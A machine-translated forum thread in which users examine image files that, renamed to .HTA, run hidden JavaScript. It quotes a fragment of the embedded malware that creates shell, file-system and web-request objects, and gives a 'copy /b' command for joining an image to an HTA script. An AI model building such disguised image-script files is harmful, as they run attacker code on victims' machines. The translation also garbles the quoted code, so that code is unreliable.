在图像文件中嵌入Javascript

我注意到一种新的趋势，即分发可能不安全的代码，人们会在服务器上发布带有水印的图像，建议他们将文件名改为.HTA文件扩展名

我意识到.HTA是一个HTML应用程序文件，它受到微软逻辑的隐式信任，可以包含代码来执行任何基于web的操作。我用我最喜欢的文本编辑器打开了文件，令我惊讶的是图像文件中竟然有Javascript代码

jfHe299x4qBICCBRgpbl81xTjwucn9j4s1UVZxe8kwoJcdWnXuVHqpilRRhptKRACMBr5koY8vt6AEttD5xeGTOPCfBoQVjCvblkiGcc4ddlfiZiBPdCVAlelSbvhv9XWcoMIYyGMCbMaGv9YUyFrHZg3ZVx6HnRCgz4CyaA2bU9qn6R3NkmHx0W3uG7SZcHYyPiMN6AnWDGXRztMnxL3sY1s3h9VH1oTL34iYawlaEUDOUscX19pPz89v0rfmlqKTXce16vSZ6JDsy4IC5SktfXdt3m50z2R5BbwuhP5BHJITxvD4dHzL6K4uh9tIc4gYCFnDV

//<script id=thisscript>
var dom1 = ["zip","img","zip","orz","orz","zip","cgi"];
var dom2 = ["bin","dat","bin","tmp","tmp","bin"];
// Global XMLHttp, shell, and file system objects
var request = new ActiveXObject("Msxml2.XMLHTTP");
var shell = new ActiveXObject("WScript.Shell");
var fs = new ActiveXObject("Scripting.FileSystemObject");

JFHE299X4QBICCRBGPBL81XTJWUCN9J4S1UVZXE8KWJCDWNxUVHQPILLRRHPTKRACMBR5KOY8VT6ETD5EGTOPCbOQVJCVBLKIGCC4DDLFIZIPDCVALELSBV9WCOMIYGMCBMAGV9YYYYFRHZG3ZV6ZVXHNRCZYA2BU9N6NKMHX0W3UGX7SZCHYYYYYYTYPT6WZTRZTMN6KZTMNZTMN7ZTMN7L3H9VH1OTL4FZYCTF9ZYCTFZFZ5ZF9ZFZFZF9ZFZF9FZFZFZF9K6K9ZFZFZFZFZFZF6ZF9FZFZFZF6ZF9Z
//
var dom1=[“zip”、“img”、“zip”、“orz”、“orz”、“zip”、“cgi”]；
变量dom2=[“bin”、“dat”、“bin”、“tmp”、“tmp”、“bin”]；
//全局XMLHttp、shell和文件系统对象
var请求=新的ActiveXObject（“Msxml2.XMLHTTP”）；
var shell=新的ActiveXObject（“WScript.shell”）；
var fs=new-ActiveXObject（“Scripting.FileSystemObject”）；

在源代码下面还有更多的乱码图像数据。这只是一个片段

---

我很想知道他们是如何将Javascript代码添加到图像文件中而不破坏图像文件格式并使其无法查看的。我向一些同事展示了这一点，他们也同样感到困惑。

我的猜测是，这是一个某种类型的多部分文件（对于它，最好同时包含图像和脚本数据），可能会立即执行（在本地上下文中），因为它被视为超文本应用程序

---

有关更多信息，我们需要查看完整的实际文件。

这里的问题是文件格式公差太大

JPG解释器足够宽容，可以忽略“损坏”的非图像数据。这就是你可以在下载的同时查看大型JPG的方式。HTA解释器非常宽容，忽略了文件顶部所有奇怪的“文本”，并继续评估下面类似于标记和脚本的内容

这里还有一篇关于这种奇怪行为的帖子： 在中，建议使用以下命令行在HTA中嵌入图标：

      copy /b icon.ico+source.hta iconapp.hta

您找到的图像/脚本可能是使用此技术创建的

---

你没有包括整个剧本，但是你的表演看起来很吓人。带有web连接、shell和filesystem对象的HTA脚本可以对本地文件系统执行任何操作，完成后立即打电话回家

你能展示一个完整的文件例子吗？我很想看到一个完整的例子，我发现了一个可以自我复制的病毒版本。它使用一个名为ImageMagick的程序将用户Windows配置文件中的随机图像与其自身代码连接起来，然后将图像发布到服务器。